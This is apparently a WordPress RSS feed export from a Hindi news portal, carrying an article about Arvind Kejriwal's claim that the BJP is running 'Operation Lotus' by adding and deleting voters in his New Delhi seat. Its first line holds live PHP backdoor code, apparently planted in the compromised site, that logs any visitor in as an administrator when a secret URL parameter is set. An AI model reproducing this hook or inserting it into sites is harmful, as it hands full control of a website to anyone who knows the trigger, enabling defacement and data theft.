// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Kejriwal’s big claim – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 29 Dec 2024 15:16:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 वोट काटने और जोड़ने पर केजरीवाल का बड़ा दावा- मेरी ही सीट पर BJP का ऑपरेशन लोटस https://pratyushaashakinayikiran.com/?p=115161 Sun, 29 Dec 2024 15:16:00 +0000 https://pratyushaashakinayikiran.com/?p=115161 नई दिल्ली
आम आदमी पार्टी के राष्ट्रीय संयोजक अरविंद केजरीवाल ने बीजेपी पर ऑपरेशन लोटस चलाने का आरोप लगाया है। केजरीवाल ने दावा किया है कि केजरीवाल उन्हीं की सीट यानी नई दिल्ली सीट पर 15 दिसंबर से ऑपरेशन लोटस चला रही है। उन्होंने आरोप लगाया कि बीजेपी चुनाव जीतने के लिए हर तरह के हथकंडे अपना रही है। मेरे नई दिल्ली विधानसभा क्षेत्र में – उनका 'ऑपरेशन लोटस' 15 दिसंबर से चल रहा है। इन 15 दिनों में, उन्होंने लगभग 5,000 वोट डिलीट करने और 7,500 वोट जोड़ने के लिए आवेदन दायर किया है।

उन्होंने कहा, नई दिल्ली में एक लाख 6 हजार वोट हैं। एक लाख 6 हजार वोट में से अगर 5 फसदी वोट यह डिलीट करवा रहे हैं और साढ़े सात वोट जोड़ रहे हैं तो फिर चुनाव कराने की जरूरत क्या है। यह तो सरेआम बदमाशी हो रही है।

केजरीवाल ने दावा किया कि बीजेपी मौजूदा वोटर के नाम डिलीट कर रही है। नई दिल्ली विधानसभा सीट पर 29 अख्टूबर से 14 दिसंबर तक 900 वोट कटवाने के लिए आवेदन आए। 15 दिसंबर से आज तक 5000 वोट डिलीशन के लिए आए।19 दिसंबर को यानी एक दिन में ही डेढ़ हजार वोट डिलीशन के लिए आए। अरविंद केजरीवाल ने कहा, जो लोग वोट काटने का आवेदन कर रहे हैं वह कौन हैं और किसके इशाके पर काम कर रहे हैं। वहीं वोट जोड़ने के मामले में उन्होंने कहा, जब चुनाव आयोग ने दो महीने तक घर-घर जाकर वोट बनाये तो अब 15 दिनों में 10 हजार वोटर कहां से आ गए, जिनके वोट बनवाये जा रहे हैं। BJP बाहर से लोगों को ला रही है, जिनके फर्जी वोट बनवाये जा रहे हैं।

]]>